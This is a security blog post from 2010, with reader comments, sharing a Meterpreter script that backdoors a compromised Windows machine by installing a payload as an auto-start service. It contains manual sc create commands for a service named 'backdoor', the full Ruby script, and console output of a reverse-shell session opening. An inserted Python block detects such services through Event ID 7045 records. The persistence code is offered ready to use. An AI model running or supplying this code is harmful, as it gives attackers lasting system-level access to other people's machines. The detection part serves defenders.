Meterpreter Script – Windows Service Creator

There are several ways to backdoor a machine that has been compromised; one of them is installing your executable as a Windows service.
The advantage is that no user has to log on for the service to run, unlike a startup entry in the registry, which only fires once a user logs in.

Doing it manually…

1. Create the service

sc create backdoor binPath= "cmd /K start c:\windows\system32\backdoor.exe" start= auto error= ignore

2. Start the service

net start backdoor

This method should work on both Windows XP and Windows 7. The only disadvantage is that the command requires administrative or SYSTEM privileges.
Metasploit ships with many useful meterpreter scripts, so I was surprised that it does not include an automated way to create a system service.

I decided to write one on my own and share it with you all.
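From the defender's side, both the manual commands above and the script further down leave the same trace: a Service Control Manager "service installed" record (Event ID 7045 in the System log) whose image path is a command interpreter (cmd /K start ...) wrapping the real executable, registered to auto-start as LocalSystem. The following Python is an added example, not part of the original post or the script; it runs simple triage rules over constructed 7045 records, and the key=value export layout and the sample entries are assumptions of the example.

```python
import re

# Constructed sample of Event ID 7045 ("A service was installed in the system")
# records in a SIEM-style key=value export (the field layout is an assumption of
# this example). The first two mirror the post's sc create ... "cmd /K start ..." services.
SAMPLE_7045 = """\
ts=2010-10-16T14:56:20|name=metasploit service|path=cmd /K start c:\\pay.exe|start=auto start|account=LocalSystem
ts=2010-10-16T15:01:02|name=backdoor|path=cmd /K start c:\\windows\\system32\\backdoor.exe|start=auto start|account=LocalSystem
ts=2010-10-16T15:10:40|name=Print Spooler Helper|path=C:\\Windows\\System32\\svchost.exe -k netsvcs|start=demand start|account=LocalSystem
ts=2010-10-16T15:12:11|name=Updater|path="C:\\Users\\bob\\AppData\\Local\\Temp\\upd.exe"|start=auto start|account=LocalSystem
"""

# A real service binary talks to the SCM itself; an ImagePath that starts with a
# command interpreter and merely launches something else is the wrapper used above.
INTERPRETER_LAUNCHER = re.compile(
    r'^\s*"?(?:[a-z]:\\[^"]*?\\)?(?:cmd|powershell|cscript|wscript|mshta)(?:\.exe)?"?(?:\s|$)',
    re.IGNORECASE)

# Executables under user-writable directories or dropped straight into a drive root.
USER_WRITABLE_IMAGE = re.compile(
    r'(?:^|\s|")(?:[a-z]:\\(?:users|temp|programdata|windows\\temp)\\|[a-z]:\\[^\\"\s]+\.exe)',
    re.IGNORECASE)


def parse_7045(text):
    """Turn the key=value export into one dict per installed service."""
    return [dict(part.split("=", 1) for part in line.split("|"))
            for line in text.splitlines() if line.strip()]


def triage_7045(text):
    """Return the records that trip at least one rule, with the reasons attached."""
    findings = []
    for rec in parse_7045(text):
        path = rec.get("path", "")
        reasons = []
        if INTERPRETER_LAUNCHER.search(path):
            reasons.append("interpreter-launched ImagePath")
        if USER_WRITABLE_IMAGE.search(path):
            reasons.append("image in user-writable or root location")
        # Auto-start under LocalSystem is what lets the service run with no logon at all.
        if reasons and rec.get("start") == "auto start" and rec.get("account") == "LocalSystem":
            reasons.append("auto-start as LocalSystem")
        if reasons:
            findings.append({"name": rec["name"], "path": path, "reasons": reasons})
    return findings
```

On a live host the same fields come from the System log, e.g. Get-WinEvent -FilterHashtable @{LogName='System'; Id=7045} in PowerShell.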

I would like to thank Humble Desser for tweaking the script and adding the ability to use service names with spaces and a service description.

I hope you’ll find it useful.

meterpreter > getuid
Server username: COMPUTER\Administrator

meterpreter > run sc -n "metasploit service" -d "reverse shell meterpreter service" -p c:\\pay.exe
[*] Creating Service meter...
[*] Starting the meter Service...
[*] Service meter Successfully Created...
meterpreter >
[*] Sending stage (749056 bytes) to 192.168.1.107
[*] Meterpreter session 2 opened (192.168.1.100:4444 -> 192.168.1.107:1091) at 2010-10-16 14:56:23 +0200

Meterpreter Script – Windows Service Creator from NightRanger on Vimeo.

# @Author: NightRanger, exploit.co.il
# @Created on: Oct 16, 2010
########################################
# Added -d "Service Description"
# Added -n "Service Payload with Spaces"
# humble-desser
########################################
session = client

@@exec_opts = Rex::Parser::Arguments.new(
    "-n" => [ true,  "Service Name." ],
    "-d" => [ true,  "Service Description."],
    "-p" => [ true,  "Service Executable Path (i.e: c:\\\\windows\\\\system32\\\\payload.exe)." ],
    "-h" => [ false, "Help Menu." ]
)

def usage
    print_line("")
    print_line("****************************")
    print_line("* Windows Service Creator  *")
    print_line("*  Author:  NightRanger    *")
    print_line("*   shai@exploit.co.il     *")
    print_line("****************************")
    print_line('run sc -n "Service Name" -d "Service Description" -p c:\\\\windows\\\\system32\\\\payload.exe')
    print(@@exec_opts.usage)
    raise Rex::Script::Completed
end


# Create the service, set its description (if one was given) and start it.
# Each command runs hidden and unchannelized, i.e. fire-and-forget on the target.
def sc_add(session, sc_name, sc_exec, sc_desc)
    print_status("Creating Service \"#{sc_name}\"...")
    session.sys.process.execute("cmd /c sc create \"#{sc_name}\" binPath= \"cmd /K start #{sc_exec}\" start= auto error= ignore", nil, {'Hidden' => true, 'Channelized' => false})
    if sc_desc
        print_status("Adding Description \"#{sc_desc}\" to the Service...")
        session.sys.process.execute("cmd /c sc description \"#{sc_name}\" \"#{sc_desc}\"", nil, {'Hidden' => true, 'Channelized' => false})
    end
    print_status("Starting the \"#{sc_name}\" Service...")
    session.sys.process.execute("cmd /c net start \"#{sc_name}\"", nil, {'Hidden' => true, 'Channelized' => false})
    print_status("Service \"#{sc_name}\" Successfully Created...")
end

sc_name  = nil
sc_exec = nil
sc_desc = nil
@@exec_opts.parse(args) { |opt, idx, val|
    case opt
    when "-h"
        usage   # prints the help and raises Rex::Script::Completed
    when "-n"
        sc_name = val
    when "-d"
        sc_desc = val
    when "-p"
        sc_exec = val
    end
}

# Both the service name and the executable path are required; the description is optional.
if sc_name && sc_exec
    sc_add(session, sc_name, sc_exec, sc_desc)
else
    usage
end

Download The Script here:

sc.tar.gz


11 Comments


  1. cP
    Oct 16, 2010

    Nice job :)


  2. Mario Vilas
    Oct 18, 2010

    “Attachment restricted to registered users only”

    :(


  3. NightRanger
    Oct 18, 2010

    Added script source in the codebox.


  4. Trancer
    Oct 19, 2010

    Very nice, thank you. Why don’t you send it to the Metasploit guys so they can add it to the framework?


  5. Trancer
    Oct 19, 2010

    BTW, I suggest you check this post out by jcran:
    http://blog.0x0e.org/2010/10/17/364/


  6. NightRanger
    Oct 19, 2010

    Thanks,

    I just haven’t had the time to check it out yet…

    http://www.metasploit.com/redmine/projects/framework/roadmap#Metasploit%203.5.0
    Feature #406: Full Java Payload Support


  7. NightRanger
    Oct 19, 2010

    Will do :)


  8. AbO-Ra3d
    May 29, 2011

    Thank you :D but please attach the command.
    Meterpreter Script – Windows Service Creator … what does it mean … can I hack XP without sending a server?


  9. NightRanger
    May 29, 2011

    No. After you get a meterpreter session, it allows you to add a service to the target machine.
